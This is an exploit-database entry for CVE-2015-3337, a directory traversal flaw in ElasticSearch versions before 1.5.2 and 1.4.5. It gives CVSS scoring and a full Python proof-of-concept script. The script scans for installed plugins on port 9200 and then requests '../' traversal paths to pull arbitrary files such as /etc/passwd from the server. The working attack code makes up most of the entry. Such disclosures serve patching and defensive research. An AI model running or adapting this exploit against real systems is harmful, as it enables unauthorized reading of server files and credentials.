ElasticSearch Directory Traversal Proof Of Concept

2015-05-04 / 2015-05-05
Credit: Pedro Andujar
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

#!/usr/bin/python # Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign # Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5 # Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net # Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/ import socket, sys print "!dSR ElasticPwn - for CVE-2015-3337\n" if len(sys.argv) <> 3: print "Ex: %s www.example.com /etc/passwd" % sys.argv[0] sys.exit() port = 9200 # Default ES http port host = sys.argv[1] fpath = sys.argv[2] def grab(plugin): socket.setdefaulttimeout(3) s = socket.socket() s.connect((host,port)) s.send("GET /_plugin/"+plugin+"/../../../../../.."+fpath+ " HTTP/1.0\n" "Host: "+host+"\n\n") file = s.recv(2048) print " [*] Trying to retrieve "+str(fpath)+":" if ("HTTP/1.0 200 OK" in file): print "\n"+file else: print "[-] File Not Found or system not vulnerable" def pfind(plugin): try: socket.setdefaulttimeout(3) s = socket.socket() s.connect((host,port)) s.send("GET /_plugin/"+plugin+"/ HTTP/1.0\n" "Host: "+host+"\n\n") file = s.recv(16) print "[*] Trying to find plugin "+plugin+":" if ("HTTP/1.0 200 OK" in file): print "[+] Plugin found!" grab(plugin) sys.exit() else: print "[-] Not Found " except Exception, e: print "[-] Error connecting to "+host+" "+str(e) sys.exit() # Include more plugin names to check if they are installed pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head'] for plugin in pluginList: pfind(plugin)

References:

http://cxsecurity.com/issue/WLB-2015040186


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top